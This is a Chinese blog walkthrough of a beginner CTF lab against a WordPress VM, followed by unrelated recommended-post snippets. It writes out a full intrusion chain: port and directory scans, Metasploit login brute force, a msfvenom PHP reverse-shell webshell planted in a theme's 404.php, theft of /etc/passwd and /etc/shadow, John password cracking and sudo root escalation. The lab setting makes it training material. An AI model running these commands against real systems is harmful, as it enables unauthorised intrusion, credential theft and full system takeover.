6-6CTF夺旗入门教程--暴力破解

最新推荐文章于 2025-04-07 16:28:12 发布
最新推荐文章于 2025-04-07 16:28:12 发布
阅读量1k 收藏 2
点赞数 1
CC 4.0 BY-SA版权
分类专栏: CTF学习 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46622606/article/details/105892770
本文详细介绍了一次完整的渗透测试过程,从信息探测、深入挖掘、暴力破解到上传webshell获取控制权,再到root权限提升,最后总结了关键步骤。通过实例演示了如何利用nmap、nikto等工具进行信息收集,如何利用msfconsole进行暴力破解,以及如何上传webshell并提权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.信息探测

#扫描主机服务信息以及服务版本
nmap -sV 192.168.2.108
#快速扫描主机全部信息
nmap -T4 -A -v 192.168.2.108
#探测敏感信息
nikto -host http://192.168.2.108
dirb http://192.168.2.108

2.深入挖掘

分析nmap、nikto扫描结果,分析挖掘可以利用的信息
查看http敏感页面
由于服务器跳转的页面无法访问,尝试制定解析到IP
http://vtcsec/secret/wp-login.php

#编辑hosts文件,制定域名解析到靶场IP
gedit /etc/hosts
192.168.2.108   vtcsec
3.暴力破解

对登录网页进行用户名探测
(kali中的wpscan打不开不知道为什么)

wpscan --url vtcsec/secret/ --enumerate u

用户名探测为admin

msfconsole
>use auxiliary/scanner/http/wordpress_login_enum
>set username admin
>set pass_file /usr/share/wordlists/dirb/common.txt
>set targeturi /secret/
>set rhosts 192.168.2.108
>run

结果:
在这里插入图片描述

4.上传webshell获取控制权

制作webshell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.2.110 lport=4444

twentyseventeen 的404.php可以上传webshell
监听4444端口

> use exploit/multi/handler 
> set payload php/meterpreter/reverse_tcp
> set lhost 192.168.2.110
> run

执行shell,获取反弹shell

http://vtcsec/secret/wp-content/themes/twentyseventeen/404.php

查看系统信息,用户权限
在这里插入图片描述

5.root权限

利用返回shell下载

download /etc/passwd
download /etc/shadow

将文件转换为john可识别的格式

unshadow passwd shadow > cracked

使用john破解密码

john cracked

在这里插入图片描述

启动终端

python -c "import pty;pty.spawn('/bin/bash')"
#登录用户
su - marlinspike
#提权
sudo -l
sudo bash
6.总结

提权时可以抓取/etc/passwd和/etc/shadow,之后使用john来破解对应密码,使用用户名密码提权
对于wp渗透中,启动对应的主题,在404页面上传webshell

CTF-MISC-基础破解-WP
single7_的博客
11-23 1934
0x01 思路 下载获得文件后解压获得基础破解rar文件 由于压缩文件格式为 rar,如果使用伪加密的方式那么rar打开时会报错,因此可以确定该文件没有使用伪加密。 下载 压缩文件密码破解工具 使用后调整选项,开始破解,破解后获得密码为 2563 使用密码 2563 打开压缩文件,解压获得 flag.txt,得到一串字符。 判断为 base64 加密字符,将获得的字符进行解密获得 flag flag{70354300a5100ba78068805661b93a5c} ...
CTF入门指南
baikeng3674的博客
02-05 5928
转自http://www.cnblogs.com/christychang/p/6032532.html ctf入门指南 如何入门?如何组队? capture the flag 比赛 类型: Web密码学pwn 程序的逻辑分析,漏洞利用windows、linux、小型机等misc 杂项,隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据reverse 逆向windows...
6-8CTF入门教程--命令执行
高冷的宅先生
05-04 747
1.命令执行漏洞介绍 当应用需要调用一些外部程序去处理内容时,会用到一些执行系统命令的函数。 如php中的system、exec、shell_exec等 当用户可以控制命令执行函数中的参数时,将可以注入 恶意系统命令到正常命令中,造成命令执行攻击 调用这些函数执行系统命令时,如果将用户的输入作为系统命令的参数拼接到命令行中,有没有过滤用户输入的情况下,就会造成命令执行漏洞 2. 信息探测 #扫描主...
CTF 入门指导教程
12-04
CTF(Capture The Flag)中文一般译作赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯” 。
CTF赛.pdf
11-16
CTF赛.pdf
CTF-Crypto实战-2024红队】Easy Code(暴力破解 密码学 梅森旋转算法)_from mt19937predictor import
2401_84247423的博客
04-28 805
get_mask()t = []else :#128t=t[-624:] ##取后624位随机数!python3。
ctf从入门到放弃:暴力破解burt force学习笔记
爱党人士
05-02 1135
通过下面这些词来了解一下什么是暴力破解攻击: 自动化+连续性尝试+ 字典 burpsuite的使用 对于proxy的理解 对该选项卡理解很关键。 在对于没有需要验证码绕过的账号密码登陆界面, 可以结合手中的字典导入,用burpsuite强力破解。(简单的很快就可以破解到后台。) ...
网络安全CTF流量分析-入门8-攻击流量行为分析_流量分析cookie的md5(1)
2401_84545016的博客
05-14 564
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
CTF总结-杂项篇
qq_42747131的博客
05-07 3278
通用过程 检查文件类型 1.1 通过file命令检查文件类型 1.2 通过binwalk命令检查文件中是否隐藏了其它文件 1.3 如果有,则通过binwalk -e命令分离,如果无法正确分离,则通过foremost进行分离 1.4 如果检查出zlib,说明隐藏了其他文件,此时foremost如果无法正确分离,则可能需要进行手动分离 判断具体题型 2.1 各类隐写 2.2 流量分析 2.3 其他类...
ctfshow-web入门-爆破(web26,27,28)
HkD01L的博客
06-20 1276
ctfshow web26 web27 web28
ctf 密码基础
weixin_73481933的博客
04-30 660
基本算法,选取一串英文字母,除去重复出现的字母,将剩下的字母逐个逐个加入 5 × 5 的矩阵内,剩下的空间由未加入的英文字母依 a-z 的顺序加入。若组内的字母相同,将 X(或 Q)加到该组的第一个字母后,重新分组。在每组中,找出两个字母在矩阵中的地方,1)若两个字母不同行也不同列,在矩阵中找出另外两个字母(第一个字母对应行优先),使这四个字母成为一个长方形的四个角。它与恺撒密码之间的区别是其密码字母表的字母不是简单的移位,而是完全是混乱的,解密时,我们一般是知道了每一个字母的对应规则,才可以正常解密。
buuctf misc基础破解
kw741951的博客
10-25 586
根据提示,尝试ARCHPR爆破(四位数字)看结尾“=‘推测应该需要base64解码。1.打开压缩包解压需要密码。输入密码解压得到字符串。
BUUCTF 基础破解
m0_49025459的博客
04-19 1170
题目 下载附件,发现压缩包有密码,而且根据题目来说是四位数字密码,扔到爆破工具里面爆破一下 爆破出密码,2563,输入密码发现是Base64加密 扔到在线破解网站,得到flagBase64解码 Base64编码 UTF8 GB2312 UTF16 GBK 二进制 十六进制 解密 - The X 在线工具 ...
ctf工具Nmap使用教程图文教程(超详细)
程序员小麦的博客
06-24 1033
kali的命令行中可以直接使用 nmap 命令,打开一个「终端」,输入 nmap 后回车,可以看到 nmap 的版本,证明 nmap 可用。
BUUCTF(Misc)——基础破解
最新发布
weixin_74738833的博客
04-07 462
BUUCTF(Misc)——基础破解
2024版最新148款CTF工具整理大全(附下载安装包)含基础环境、Web 安全、加密解密、密码爆破、文件、隐写、逆向、PWN等全套工具
Libra1313的博客
10-23 1万+
经常会有大学生粉丝朋友私信大白,想通过打CTF比赛镀金,作为进入一线互联网大厂的门票。但是在CTF做题很多的时候都会用到工具,所以在全网苦寻CTF比赛工具安装包!
CTF — 压缩包密码爆破
热门推荐
Liu_Bruce的博客
08-06 1万+
​ 在CTF比赛中,密码爆破压缩包(如ZIP或RAR文件)是一个常见的任务。针对ZIP压缩包的密码爆破主要是使用工具ARCHPR完成的。
CTF入门教程(非常详细)从零基础入门到竞赛,看这一篇就够了!
小司机的奥拓
02-05 1157
CTF(Capture The Flag)中文一般译作赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯”。MISC(安全杂项)
CTF题目合集
cgygsw的博客
01-26 5080
在给定的代码中,call_user_func_array(array($this, $this->method), $this->args) 的作用是调用对象 $this 的方法 $this->method(也就是调用ping函数的方法 也就是destruct下面那个ping函数),并将 $this->args 数组作为参数传递给该方法。反序列化之后就会调用wakeup这个函数 : 这个函数的内容 是对参数的内容进行了循环遍历 执行WAF函数的内容。
foremost-master: CTF隐写工具使用教程
6. 使用场景:Foremost主要用于信息安全分析、数据恢复和计算机取证,以及在CTF竞赛中处理隐写挑战。 在处理foremost-master.zip时,如果是在CTF环境中,通常是为了获取或分析这个工具的源代码,以便更好地理解和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值